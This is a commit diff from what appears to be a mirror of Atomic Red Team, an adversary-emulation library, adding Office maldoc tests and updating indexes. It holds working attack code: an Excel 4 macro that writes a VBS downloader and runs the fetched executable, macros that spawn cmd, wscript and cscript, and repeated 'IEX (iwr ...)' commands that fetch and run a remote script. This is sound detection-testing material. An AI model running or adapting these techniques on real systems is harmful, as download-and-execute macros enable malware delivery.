security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update output file name to match expected (#1315)

Browse Source 
* update output file name to match expected

* Generate docs from job=validate_atomics_generate_docs branch=clr2of8-patch-1

* Generate docs from job=validate_atomics_generate_docs branch=clr2of8-patch-1

Co-authored-by: CircleCI Atomic Red Team doc generator <email>
This commit is contained in:
Carrie Roberts
2020-12-09 09:26:36 -07:00
committed by GitHub
parent 8e33c2801e
commit 1ca8072bc9
11 changed files with 422 additions and 165 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+2
View File
@@ -633,6 +633,7 @@ execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-8
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -661,6 +662,7 @@ execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a rem
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
633 execution T1204.002 Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
634 execution T1204.002 Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
635 execution T1204.002 Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
636 execution T1204.002 Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
637 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
638 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
639 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
662 execution T1059.004 Unix Shell 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
663 execution T1059.004 Unix Shell 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
664 execution T1059.005 Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
665 execution T1059.005 Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
666 execution T1059.003 Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
667 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
668 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
atomics/Indexes/Indexes-CSV/windows-index.csv
+2
View File
@@ -439,6 +439,7 @@ execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-8
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -465,6 +466,7 @@ execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
439 execution T1204.002 Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
440 execution T1204.002 Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
441 execution T1204.002 Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
442 execution T1204.002 Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
443 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
444 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
445 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
466 execution T1569.002 Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
467 execution T1569.002 Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
468 execution T1059.005 Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
469 execution T1059.005 Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
470 execution T1059.003 Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
471 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
472 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
atomics/Indexes/Indexes-Markdown/index.md
+2
View File
@@ -1090,6 +1090,7 @@
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -1133,6 +1134,7 @@
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
atomics/Indexes/Indexes-Markdown/windows-index.md
+2
View File
@@ -836,6 +836,7 @@
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -875,6 +876,7 @@
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
atomics/Indexes/index.yaml
+197 -98
View File
@@ -40405,7 +40405,7 @@ discovery:
- linux
- macos
executor:
command: 'username=$(echo $HOME | awk -F''/'' ''{print $3}'') && lsof -u $username
command: 'username=$(id -u -n) && lsof -u $username
'
name: sh
@@ -44322,35 +44322,30 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
ms_office_version:
description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
Default latest version.
type: String
default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
-Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
| Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
cleanup_command: |
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
$ms_office_version = #{ms_office_version}
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
'
name: powershell
- name: OSTap Payload Download
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
@@ -44388,34 +44383,27 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
ms_office_version:
description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
Default latest version.
type: String
default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
-Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
| Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
cleanup_command: |
$ms_office_version = #{ms_office_version}
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: OSTAP JS version
auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
@@ -44433,35 +44421,27 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
ms_office_version:
description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
Default latest version.
type: String
default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
-Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
| Sort-Object -desc)
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
cleanup_command: |
$ms_office_version = #{ms_office_version}
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: Office launching .bat file from AppData
auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
@@ -44473,41 +44453,126 @@ execution:
bat_path:
description: Path to malicious .bat file
type: String
default: $env:temp+"\art1204.bat"
ms_office_version:
description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
Default latest version.
type: string
default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
-Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
| Sort-Object -desc)[0]
default: $("$env:temp\art1204.bat")
ms_product:
description: Maldoc application Word or Excel
type: String
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$bat_path = #{bat_path}
$macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
name: powershell
- name: Excel 4 Macro
auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
description: |
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
with Excel matches that of the local system. This username can be found under Files -> Options -> Username
supported_platforms:
- windows
input_arguments:
download_url:
description: Download URL
type: String
default: https://live.sysinternals.com/procexp.exe
uname:
description: Username for pathing
type: String
default: "$env:Username"
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft Excel must be installed
'
prereq_command: |
try {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
manually to meet this requirement"
'
executor:
command: |
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
$fname1 = "$env:TEMP\procexp.exe"
if (Test-Path $fname) {
Remove-Item $fname
Remove-Item $fname1
}
$xlApp = New-Object -COMObject "Excel.Application"
$xlApp.Visible = $True
$xlApp.DisplayAlerts = $False
$xlBook = $xlApp.Workbooks.Add()
$sheet = $xlBook.Excel4MacroSheets.Add()
if ("#{uname}" -ne "") {
$sheet.Cells.Item(1,1) = "#{uname}"
} else {
$sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
}
$sheet.Cells.Item(2,1) = "procexp.exe"
$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
$sheet.Cells.Item(23,1) = "=HALT()"
$sheet.Cells.Item(1,1).Name = "runme"
$xlApp.Run("runme")
$xlApp.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()
Remove-Variable xlBook
Remove-Variable xlApp
cleanup_command: |
$ms_office_version = #{ms_office_version}
if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Stop-Process -Name "procexp*" -ErrorAction Ignore
Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
name: powershell
T1204.001:
technique:
@@ -46107,11 +46172,46 @@ execution:
New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
executor:
command: 'cscript #{vbscript} > $env:TEMP\out.txt'
command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
cleanup_command: |-
Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
name: powershell
- name: Encoded VBS code execution
auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
description: |
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
You can validate this by opening WinWord -> File -> Account -> About Word
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'The 64-bit version of Microsoft Office must be installed
'
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
manually to meet this requirement"
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
-like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
'
name: powershell
T1059.003:
technique:
created: '2020-03-09T14:12:31.196Z'
@@ -55331,31 +55431,30 @@ initial-access:
description: Maldoc application Word or Excel
type: String
default: Word
ms_office_version:
description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
type: String
default: '16.0'
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependent registry keys
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
{ exit 0 } else { exit 1 }
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
cleanup_command: |
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
'
name: powershell
T1566.002:
technique:
atomics/T1059.005/T1059.005.md
+53 -1
View File
@@ -10,6 +10,8 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
- [Atomic Test #1 - Visual Basic script execution to gather local computer information](#atomic-test-1---visual-basic-script-execution-to-gather-local-computer-information)
- [Atomic Test #2 - Encoded VBS code execution](#atomic-test-2---encoded-vbs-code-execution)
<br/>
@@ -33,7 +35,7 @@ When successful, system information will be written to $env:TEMP\T1059.005.out.t
```powershell
cscript #{vbscript} > $env:TEMP\out.txt
cscript #{vbscript} > $env:TEMP\T1059.005.out.txt
```
#### Cleanup Commands:
@@ -60,4 +62,54 @@ Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
<br/>
<br/>
## Atomic Test #2 - Encoded VBS code execution
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
You can validate this by opening WinWord -> File -> Account -> About Word
**Supported Platforms:** Windows
#### Attack Commands: Run with `powershell`!
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
```
#### Cleanup Commands:
```powershell
Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
```
#### Dependencies: Run with `powershell`!
##### Description: The 64-bit version of Microsoft Office must be installed
##### Check Prereq Commands:
```powershell
try {
$wdApp = New-Object -COMObject "Word.Application"
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
```
<br/>
atomics/T1059.005/T1059.005.yaml
+2 -2
View File
@@ -23,13 +23,13 @@ atomic_tests:
New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
executor:
command: 'cscript #{vbscript} > $env:TEMP\out.txt'
command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
cleanup_command: |-
Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
name: powershell
- name: Encoded VBS code execution
auto_generated_guid:
auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
description: |
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
atomics/T1204.002/T1204.002.md
+149 -55
View File
@@ -18,6 +18,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
- [Atomic Test #5 - Office launching .bat file from AppData](#atomic-test-5---office-launching-bat-file-from-appdata)
- [Atomic Test #6 - Excel 4 Macro](#atomic-test-6---excel-4-macro)
<br/>
@@ -38,7 +40,6 @@ References:
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:&#92;Users&#92;Public&#92;art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
